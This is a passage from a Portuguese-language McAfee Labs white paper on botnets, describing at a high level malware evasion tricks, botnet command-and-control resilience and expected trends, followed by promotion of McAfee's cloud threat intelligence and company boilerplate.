Essa etapa pode, efetivamente, inviabilizar os vários mecanismos tradicionais de detecção com base em
listas negras.
Os malfeitores desenvolveram muitas técnicas de evasão para downloads inadvertidos evadirem
inspeções por dispositivos de segurança de rede. Um bom exemplo é a manipulação de extensões de
arquivo demonstrada pelo construtor Gh0st RAT. (Veja a tela seguinte). A Operação Aurora e outras
novas ameaças de malware utilizaram truques semelhantes. Vimos muitos outros tipos de evasão —
de simples codificação a criptografia (até mesmo operações XOR no binário) — no empenho dos
criadores de malware de conseguir instalar seu software na máquina da vítima.




Nos últimos anos, várias redes de bots grandes foram tiradas do ar. Para evitar esses êxitos da segurança e
tornar a infraestrutura de suas redes de bots mais forte e mais resistente, os mestres de bots começaram
a introduzir técnicas novas. Já vimos técnicas de fluxo para aumentar a capacidade de recuperação dos
servidores de controle. O protocolo P2P, embora de suporte e implementação caros, foi utilizado em um
bom número de redes de bots ocultas, como Storm e Nugache. Protocolos da Web, criptografados ou não,
são amplamente utilizados como alternativa de comando ao protocolo IRC, mais frequentemente utilizado,
principalmente porque essas portas Web são quase universalmente permitidas por firewalls, mesmo em
redes corporativas rigidamente controladas.
O McAfee Labs prevê que tanto cibercriminosos quanto criadores de redes de bots continuem a ir além
dos limites das tecnologias Web 2.0. Alguns outros avanços que prevemos:
•	 Acesso e funcionalidade com vários navegadores, muito além de Internet Explorer e Firefox.
•	 Maior integração incorporada com tecnologias de mensagens instantâneas, como JabberZeuS,
   para proporcionar acesso rápido a dados bancários e outros.
•	 Integração adicional com outros malwares, como Bredolad e Pushdo, para assegurar um maior
   predomínio global em sistemas.




                                                                                                        13
                                              White Paper              A nova era das redes de bots




                                              Combate através da Global Threat Intelligence
                                              Como as ameaças cibernéticas crescem exponencialmente enquanto se tornam cada vez mais sofisticadas,
                                              os profissionais de segurança precisam de uma abordagem diferente para detectar e frustrar os ataques.
                                              No passado, bastava uma estratégia de defesa em profundidade — camadas de tecnologias semelhantes.
                                              A abordagem atual, porém, precisa cotejar informações de ameaças correlacionadas do mundo todo
                                              e entre todos os vetores de ameaças. Essa inteligência precisa ser fornecida a uma ampla gama de
                                              produtos de segurança, permitindo que esses produtos cumpram políticas locais com base na atividade
                                              de ameaças mais recente e compartilhem informações para que toda a infraestrutura de segurança
                                              funcione harmoniosamente.
                                              A McAfee está escrevendo o próximo capítulo da defesa em profundidade com a Global Threat
                                              Intelligence, nosso mecanismo “in the cloud” (computação na nuvem) que coleta e correlaciona
                                              dados de ameaças de todos os vetores de ameaças, constrói um modelo completo de ameaças
                                              e proporciona proteção no mercado através de uma suíte completa de produtos de segurança.
                                              Nossa capacidade “in the cloud” (computação na nuvem) funciona em conjunto com os mecanismos
                                              de cumprimento com base em políticas e mecanismos locais dos produtos McAfee para proporcionar
                                              a proteção mais robusta e abrangente contra ameaças do mercado. Nossos clientes se beneficiam de
                                              produtos de segurança da McAfee que não apenas compartilham inteligência, mas que o fazem de
                                              uma maneira significativa e contextualizada em seu papel e posicionamento na rede.

                                              Referências
                                              •	 “Progress Made, Trends Observed” (Progresso feito, tendências observadas), Microsoft Antimalware
                                                 Team. http://download.microsoft.com/download/5/6/d/56d20350-afc8-4051-a0df-677b28298912/
                                                 msrt%20-%20progress%20made%20lessons%20learned.pdf
                                              •	 SecureWorks. http://www.secureworks.com/

                                              •	 Documentos técnicos do McAfee Labs. http://www.mcafee.com/us/threat_center/white_paper.html


                                              Sobre o McAfee Labs™
                                              McAfee Labs é o grupo de pesquisa global da McAfee, Inc. Com a única organização de pesquisa
                                              dedicada a todos os vetores de ataque — malware, Web, e-mail, redes e vulnerabilidades — o McAfee
                                              Labs reúne informações de seus milhões de sensores e de suas tecnologias de reputação com base
                                              em “cloud computing”, como McAfee Artemis™ e McAfee TrustedSource™. Os 350 pesquisadores
                                              multidisciplinares do McAfee Labs em 30 países acompanham toda a gama de ameaças em tempo real,
                                              identificando vulnerabilidades em aplicativos, analisando e correlacionando riscos e permitindo uma
                                              remediação instantânea para proteger as empresas e o público.

                                              Sobre a McAfee
                                              A McAfee, Inc., sediada em Santa Clara, Califórnia, é a maior empresa do mundo dedicada à tecnologia de
                                              segurança. Totalmente comprometida em combater os rigorosos desafios de segurança globais, a McAfee
                                              provê soluções proativas e com qualidade comprovada e serviços que ajudam a manter sistemas e redes
                                              protegidos mundialmente, permitindo aos usuários conectarem-se à Internet, navegarem e realizarem
                                              compras pela Web com segurança. Apoiada por uma equipe de pesquisas premiada, a McAfee desenvolve
                                              produtos inovadores que capacitam os usuários domésticos, as empresas dos setores público e privado
                                              e os provedores de serviços, permitindo-lhes manter a conformidade com as regulamentações de mercado,
                                              proteger dados, prevenir interrupções, identificar vulnerabilidades e monitorar continuamente, além de
                                              incrementar a segurança em TI. www.mcafee.com.br.




                                              As informações deste documento são fornecidas somente para fins educacionais e para conveniência dos clientes da McAfee. As informações
                                              aqui contidas estão sujeitas a alterações sem notificação, sendo fornecidas “no estado”, sem garantia de qualquer espécie quanto à precisão
                                              e aplicabilidade das informações a qualquer circunstância ou situação específica.


McAfee do Brasil Comércio de Software Ltda.
Av. das Nações Unidas, 8.501 - 16° andar      McAfee e o logotipo McAfee são marcas registradas ou marcas comerciais da McAfee, Inc. e/ou de suas subsidiárias nos Estados Unidos e em
CEP 05425-070 - São Paulo - SP - Brasil       outros países. Os outros nomes e marcas podem ser propriedade de terceiros. Os planos, especificações e descrições de produtos aqui contidos
Telefone: +55 (11) 3711-8200                  são fornecidos apenas com fins informativos e estão sujeitos a alterações sem notificação prévia. Eles são fornecidos sem garantia de qualquer
Fax: +55 (11) 3711-8286                       espécie, expressa ou implícita.
www.mcafee.com.br                             10204wp_botnets_0710_ETMG

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:3
posted:9/4/2011
language:Portuguese
pages:14